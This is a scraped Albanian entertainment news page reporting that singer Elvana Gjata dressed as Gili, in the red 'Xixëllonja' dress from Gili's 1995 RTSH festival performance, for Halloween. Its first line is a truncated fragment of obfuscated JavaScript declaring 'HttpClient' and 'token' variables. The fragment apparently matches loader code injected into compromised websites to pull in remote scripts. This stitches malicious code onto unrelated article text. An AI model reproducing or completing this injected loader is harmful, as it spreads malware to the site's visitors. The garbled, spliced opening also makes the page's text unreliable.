;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Elvana Gjata në fustanin e ‘Xixëllonjës’ së Gilit për Halloween

By

 

Në fund të vitit 1995, këngëtarja kosovare Gili performoi në Festivalin e fundvitit në RTSH, me këngën “Xixëllonja”.

Kënga pos që mori zemrat e shqiptarëve dhe mbeti gjatë në kujtesën e tyre, vëmendje mori edhe paraqitja e këngëtares gjatë performancës.

Me një fustan të gjatë të kuq, të kombinuara me mëngë të gjata, e kordele të vendosur në kokë, fustani padyshim mori vëmendjen e të gjithëve në atë kohë.

Por, 27 vite më pas këngëtarja shumë e kërkuar Elvana Gjata, vendosi që për Halloween të bëhej si Gili.

Ajo u shfaq si Gili për një nga mbrëmjet e saj muzikore, pamjet e të cilës mund t’i shihni në postimin e mëposhtën. /Prive.al

Artikuj të ngjashëm